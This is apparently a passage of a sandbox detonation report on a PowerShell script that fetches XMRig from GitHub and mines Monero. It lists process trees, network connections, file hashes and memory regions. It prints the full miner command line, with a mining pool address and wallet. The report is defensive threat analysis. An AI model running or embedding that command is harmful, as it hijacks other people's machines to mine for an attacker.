"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/5076-0-0x00007FFB4F953000-0x00007FFB4F955000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tisrlelu.1vk.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5076-9-0x0000017E3BD90000-0x0000017E3BDB2000-memory.dmp
memory/5076-10-0x00007FFB4F950000-0x00007FFB50412000-memory.dmp
memory/5076-11-0x00007FFB4F950000-0x00007FFB50412000-memory.dmp
memory/5076-12-0x00007FFB4F950000-0x00007FFB50412000-memory.dmp
memory/5076-14-0x0000017E3BDC0000-0x0000017E3BDD2000-memory.dmp
memory/5076-15-0x0000017E3BD70000-0x0000017E3BD7A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3028-46-0x000001D81C9A0000-0x000001D81C9C0000-memory.dmp
memory/3028-47-0x000001D81C9F0000-0x000001D81CA10000-memory.dmp
memory/3028-48-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/5076-49-0x00007FFB4F950000-0x00007FFB50412000-memory.dmp
memory/3028-50-0x000001D81E2D0000-0x000001D81E2F0000-memory.dmp
memory/3028-51-0x000001D81E2F0000-0x000001D81E310000-memory.dmp
memory/5076-53-0x00007FFB4F953000-0x00007FFB4F955000-memory.dmp
memory/3028-52-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-54-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-55-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-57-0x000001D81E2F0000-0x000001D81E310000-memory.dmp
memory/3028-56-0x000001D81E2D0000-0x000001D81E2F0000-memory.dmp
memory/3028-58-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-59-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-60-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-61-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-62-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-63-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-64-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-65-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-66-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-67-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-68-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-69-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-70-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-71-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-72-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-73-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-74-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-75-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-76-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-77-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-78-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-79-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-80-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-81-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-82-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-83-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-84-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-85-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-86-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-87-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-88-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-89-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-90-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-91-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-92-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-93-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-94-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-95-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-96-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-97-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-98-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-99-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-100-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-101-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-102-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-103-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-104-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-105-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-106-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-107-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-108-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-109-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-110-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-111-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-112-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-113-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-114-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-115-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
memory/3028-116-0x00007FF65FC30000-0x00007FF660863000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:35
Platform
win10-20240404-en
Max time kernel
1790s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4412 wrote to memory of 4208 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4412 wrote to memory of 4208 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
memory/4412-3-0x00007FFAA0043000-0x00007FFAA0044000-memory.dmp
memory/4412-5-0x00000292D22A0000-0x00000292D22C2000-memory.dmp
memory/4412-6-0x00007FFAA0040000-0x00007FFAA0A2C000-memory.dmp
memory/4412-10-0x00007FFAA0040000-0x00007FFAA0A2C000-memory.dmp
memory/4412-9-0x00000292D2460000-0x00000292D24D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p15p02t5.ibw.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4412-25-0x00007FFAA0040000-0x00007FFAA0A2C000-memory.dmp
memory/4412-48-0x00000292D25E0000-0x00000292D25F2000-memory.dmp
memory/4412-61-0x00000292D2440000-0x00000292D244A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4208-90-0x00000218DE6D0000-0x00000218DE6F0000-memory.dmp
memory/4208-91-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4412-92-0x00007FFAA0040000-0x00007FFAA0A2C000-memory.dmp
memory/4412-94-0x00007FFAA0043000-0x00007FFAA0044000-memory.dmp
memory/4208-93-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4412-95-0x00007FFAA0040000-0x00007FFAA0A2C000-memory.dmp
memory/4208-96-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-97-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-98-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-99-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-100-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-101-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-102-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-103-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-104-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-105-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-106-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-107-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-108-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-109-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-110-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-111-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-112-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-113-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-114-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-115-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-116-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-117-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-118-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-119-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-120-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-121-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-122-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-123-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-124-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-125-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-126-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-127-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-128-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-129-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-130-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-131-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-132-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-133-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-134-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-135-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-136-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-137-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-138-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-139-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-140-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-141-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-142-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-143-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-144-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-145-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-146-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-147-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-148-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-149-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-150-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-151-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-152-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-153-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-154-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-155-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
memory/4208-156-0x00007FF7D20D0000-0x00007FF7D2D03000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:35
Platform
win10v2004-20240611-en
Max time kernel
1794s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4888 wrote to memory of 5024 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4888 wrote to memory of 5024 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4304,i,6041070687820623968,3004230300437737550,262144 --variations-seed-version --mojo-platform-channel-handle=3476 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1416,i,6041070687820623968,3004230300437737550,262144 --variations-seed-version --mojo-platform-channel-handle=2284 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 184.28.176.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.176.28.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
memory/4888-0-0x00007FFD92FD3000-0x00007FFD92FD5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dbjbj4do.qsw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4888-10-0x00000214E38C0000-0x00000214E38E2000-memory.dmp
memory/4888-11-0x00007FFD92FD0000-0x00007FFD93A91000-memory.dmp
memory/4888-12-0x00007FFD92FD0000-0x00007FFD93A91000-memory.dmp
memory/4888-14-0x00000214E38F0000-0x00000214E3A3E000-memory.dmp
memory/4888-15-0x00007FFD92FD0000-0x00007FFD93A91000-memory.dmp
memory/4888-17-0x00000214E3C90000-0x00000214E3C9A000-memory.dmp
memory/4888-16-0x00000214E3CA0000-0x00000214E3CB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5024-48-0x00000233D05E0000-0x00000233D0600000-memory.dmp
memory/5024-49-0x00000233D0630000-0x00000233D0650000-memory.dmp
memory/4888-50-0x00000214E38F0000-0x00000214E3A3E000-memory.dmp
memory/5024-51-0x00007FF75B0D0000-0x00007FF75BD03000-memory.dmp
memory/4888-53-0x00007FFD92FD3000-0x00007FFD92FD5000-memory.dmp
